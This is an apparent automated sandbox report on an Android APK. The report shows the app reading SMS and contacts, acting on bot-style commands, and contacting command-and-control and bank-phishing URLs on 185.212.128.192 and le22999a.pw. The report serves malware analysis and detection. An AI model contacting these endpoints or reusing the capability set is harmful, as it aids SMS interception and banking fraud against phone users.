Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Monitors incoming Phone callsShow sources
Source: com.aviasalea.rcs.RestartServiceRegistered receiver: android.intent.action.PHONE_STATE
Monitors incoming SMSShow sources
Source: com.aviasalea.mess.service.receiver.SmsReceiverRegistered receiver: android.provider.Telephony.SMS_RECEIVED
Queries SMS dataShow sources
Source: com.aviasalea.srs.api.requests.RegistrationReportStep4Request;->getHttpParams:18API Call: android.net.Uri.parse("content://sms/inbox")
Source: com.aviasalea.srs.api.requests.RegistrationReportStep5Request;->getHttpParams:16API Call: android.net.Uri.parse("content://sms/sent")
Queries a list of installed applicationsShow sources
Source: com.aviasalea.checktls.CmndTls;->getAllInstalledApkInfo:21API Call: android.content.pm.PackageManager.queryIntentActivities
Queries email messagesShow sources
Source: com.aviasalea.checktls.CntctsTls;->doInBackground:52Field access: android.provider.ContactsContract$CommonDataKinds$Email.CONTENT_URI
Queries phone contact informationShow sources
Source: com.aviasalea.checktls.CmndTls$3;->run:19Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI
Source: com.aviasalea.checktls.CntctsTls;->doInBackground:61Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI

Remote Access Functionality:

barindex
Found parser code for incoming SMS (may be used to act on incoming SMS, BOT)Show sources
Source: com.aviasalea.mess.service.receiver.SmsReceiver;->onReceive:17API Call: java.lang.String.equals android.provider.Telephony.SMS_RECEIVED
Found suspicious command strings (may be related to BOT commands)Show sources
Source: Lcom/aviasalea/srs/CmndSrs;->sendSMSReportToServer(J)VMethod string: "send_sms"
Source: Lcom/aviasalea/srs/CmndSrs;->parseStartAccessEnd(Lcom/aviasalea/srs/api/responses/StatusResponse;)VInstruction: "lcom/aviasalea/srs/cmndsrs;->sendstartaccessendtoserver(j)v"
Source: Lcom/aviasalea/checktls/CmndTls;->getPhoneIMEINumber(Landroid/content/Context;)Ljava/lang/String;Instruction: "landroid/telephony/telephonymanager;->getimei()ljava/lang/string;"
Source: Lcom/aviasalea/srs/CmndSrs;->parseSendSmsStatusEnd(Lcom/aviasalea/srs/api/responses/StatusResponse;)VInstruction: "lcom/aviasalea/srs/cmndsrs;->sendsmsstatusendtoserver(j)v"
Source: Lcom/aviasalea/srs/CmndSrs;->sendSMSReportToServer(J)VInstruction: "const-string v3, "send_sms""

Antivirus and Machine Learning Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

android-buttoncam-android

Created / dropped Files

No created / dropped files found

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.212.128.192/1324273/report.phptrue
    unknown
    http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=ontrue
      unknown
      http://185.212.128.192/favicon.icotrue
        unknown
        http://185.212.128.192/1324273/bee/avia/index1.php?ID=450785365059857103true
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://185.212.128.192/1324273/librealtalk-jni.sotrue
            unknown
            http://185.212.128.192/1324273/bee/avia/index1.phplibrealtalk-jni.sofalse
              unknown
              http://185.212.128.192/1324273/gate.phpandroidtrue
                unknown
                http://185.212.128.192/1324273/bee/tin/index.phpandroidfalse
                  unknown
                  http://schemas.android.com/apk/res/androidnotification_template_icon_group.xml, service_conf.xml, payment_ic_visa.xml, ntivu.xml, notification_media_action.xml, keyboard_view.xml, notification_template_part_time.xml, payment_ic_amex.xml, AndroidManifest.xmlfalse
                    high
                    http://185.212.128.192/1324273/bee/homecredit/index.phpandroidfalse
                      unknown
                      http://185.212.128.192/1324273/bee/avia/index1.phpru.berbankmobilecom.android.settings.DeviceAdminAdlibrealtalk-jni.sofalse
                        unknown
                        http://185.212.128.192/1324273/bee/alfa/index.phpandroidfalse
                          unknown
                          http://185.212.128.192/1324273/bee/open/index.phpandroidfalse
                            unknown
                            http://185.212.128.192/1324273/bee/rus/index.phpandroidfalse
                              unknown
                              http://schemas.android.com/apk/res-autosber_login.xmlfalse
                                high
                                http://le22999a.pw/1324273/librealtalk-jni.sofalse
                                  unknown
                                  http://185.212.128.192/1324273/http://le22999a.pw/1324273/start_accessdisable_sdef_sms_cl_packagepsulibrealtalk-jni.sofalse
                                    unknown
                                    http://185.212.128.192/1324273/bee/vtb.phpandroidfalse
                                      unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPCountryFlagASNASN NameMalicious
                                      74.125.140.188
                                      United States
                                      15169unknownfalse
                                      185.212.128.192
                                      Germany
                                      200313unknowntrue

                                      Static File Info

                                      General

                                      File type:Zip archive data
                                      Entropy (8bit):7.911695777595332
                                      TrID:
                                      • Android Package (19004/1) 46.91%
                                      • Java Archive (13504/1) 33.34%
                                      • ZIP compressed archive (8000/1) 19.75%
                                      File name:wBBPLjgyoW
                                      File size:1016370
                                      MD5:2f07c9b2a67104f8bc08d831c8922b6a